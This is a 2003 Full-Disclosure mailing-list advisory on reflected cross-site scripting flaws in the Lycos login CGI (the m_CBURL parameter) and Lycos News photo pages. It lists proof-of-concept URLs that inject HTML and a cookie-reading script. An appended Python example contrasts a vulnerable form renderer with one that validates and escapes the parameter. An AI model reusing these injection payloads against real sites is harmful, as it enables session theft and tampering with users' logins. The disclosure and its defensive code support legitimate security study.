[Full-Disclosure] Lycos Authenticating Systems and Lycos News server Vulnerabilities

From: Lorenzo Hernandez Garcia-Hierro (novappc_at_novappc.com)
Date: 06/14/03

  • Next message: Lorenzo Hernandez Garcia-Hierro: "[Full-Disclosure] Ok KF, i tell you about the buffer overflow in Sphera"
    To: <full-disclosure@lists.netsys.com>
    Date: Sat, 14 Jun 2003 16:48:05 +0200
    
    

    ---------------
    Systems affected: Lycos authenticating servers, Login forms, Lycos News Site
    Risk: 7
    Type of errors: Input Validation Flaw
    ---------------
    I encountered security holes in the Lycos Authentication servers. These
    servers are affected by multiple Cross Site Scripting
    attacks. The hole is in the way that the login cgi program makes the final
    login form; injecting a final tag like "> in the m_CBURL
    variable, you can inject html and script in the login form. In addition, I
    encountered security holes in the Lycos News server related to XSS attacks.
    -------------
    EXPLOITS / PROOFS OF CONCEPT
    -------------
    http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL=">[HERE COMES YOUR XSS
    ATTACK CODE]

    http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
    [XSS ATTACK CODE]

    ------------
    SAMPLES
    ------------
    http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
    <H1>xss in Lycos WebSites</h1>
    http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
    <script>alert(document.cookie);</script>
    http://news.lycos.com/news/photo.asp?section=BreakingPhotos&photoId=352417">
    <iframe></iframe>
    http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><h1>XSS in Lycos Authenticating Servers</h1><a href="
    http://ldbauth.lycos.com/cgi-bin/mayaLogin?m_CBURL="><script>alert(document.cookie);</script>

    ------------------------------------------------------
    Lorenzo Hernandez Garcia-Hierro
    --- Computer Security Analyzer ---
    --Nova Projects Professional Coding--
    PGP: Keyfingerprint
    B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
    ID: 0x9C38E1D7
    **********************************
    www.novappc.com
    security.novappc.com
    www.lorenzohgh.com
    ______________________

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
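
Added example, not part of the original post and not Lycos code: a sketch of how a login form that reflects m_CBURL into an attribute breaks on the "> sample above, next to a hardened renderer that validates the callback URL and escapes it for the attribute context. The form markup, the allowed host list and the default callback are assumptions; evil.example is a constructed host.

```python
import html
from urllib.parse import urlsplit

# Assumed values for illustration; the real form and host list are not on the page.
ALLOWED_CALLBACK_HOSTS = {"www.lycos.com", "news.lycos.com"}
DEFAULT_CALLBACK = "http://www.lycos.com/"
FORM = ('<form method="post" action="/cgi-bin/mayaLogin">'
        '<input type="hidden" name="m_CBURL" value="{cb}">'
        '<input name="user"><input type="password" name="pass">'
        '</form>')

# Benign <h1> sample value taken from the advisory's SAMPLES section.
SAMPLE = '"><h1>XSS in Lycos Authenticating Servers</h1><a href="'


def render_vulnerable(cb_url: str) -> str:
    """Reflect the parameter verbatim: '">' closes the attribute and the tag."""
    return FORM.format(cb=cb_url)


def safe_callback(cb_url: str) -> str:
    """Return cb_url only if it is an http(s) URL on an allowed host."""
    try:
        parts = urlsplit(cb_url)
    except ValueError:
        return DEFAULT_CALLBACK
    if parts.scheme not in ("http", "https"):
        return DEFAULT_CALLBACK
    # .hostname drops userinfo and port, so "allowed-host@other-host" is rejected.
    if parts.hostname not in ALLOWED_CALLBACK_HOSTS:
        return DEFAULT_CALLBACK
    return cb_url


def render_hardened(cb_url: str) -> str:
    """Validate the URL, then escape it for the HTML attribute context.

    Both steps are needed: an allowed host can still carry quotes and
    angle brackets in its path, and escaping alone would accept any URL.
    """
    return FORM.format(cb=html.escape(safe_callback(cb_url), quote=True))


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE))
    print(render_hardened(SAMPLE))
    print(render_hardened('http://news.lycos.com/news/"><h1>x</h1>'))
```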

